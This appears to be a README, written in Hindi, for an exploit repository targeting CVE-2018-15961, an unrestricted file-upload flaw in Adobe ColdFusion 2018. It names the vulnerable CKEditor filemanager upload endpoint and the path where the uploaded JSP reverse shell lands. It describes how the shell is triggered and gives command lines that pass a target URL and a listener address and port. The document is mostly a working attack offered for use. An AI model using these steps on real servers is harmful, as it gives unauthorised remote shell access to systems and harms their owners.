
CVE-2018-15961 के लिए शोषण, Adobe ColdFusion 2018 में एक अप्रतिबंधित फ़ाइल अपलोड भेद्यता जो RCE की ओर ले जाती है
यह रिपॉजिटरी Adobe ColdFusion 2018 में RCE भेद्यता के लिए मेरे एक्सप्लॉइट कोड को शामिल करता है।
एक्सप्लॉइट /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm पर एक JSP रिवर्स शेल युक्त POST अनुरोध भेजता है। यदि सफल होता है, तो यह शेल को /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell.jsp पर अपलोड करता है। कोड तब एक सरल GET अनुरोध भेजकर शेल को ट्रिगर करता है।
# Basic usage
python3 coldfusion_rce.py -u http://172.31.1.15:8500 -l 10.10.0.25 -p 443
# With custom filename for the shell
python3 coldfusion_rce.py -u http://172.31.1.15:8500 -l 10.10.0.25 -p 443 -f reverse.jsp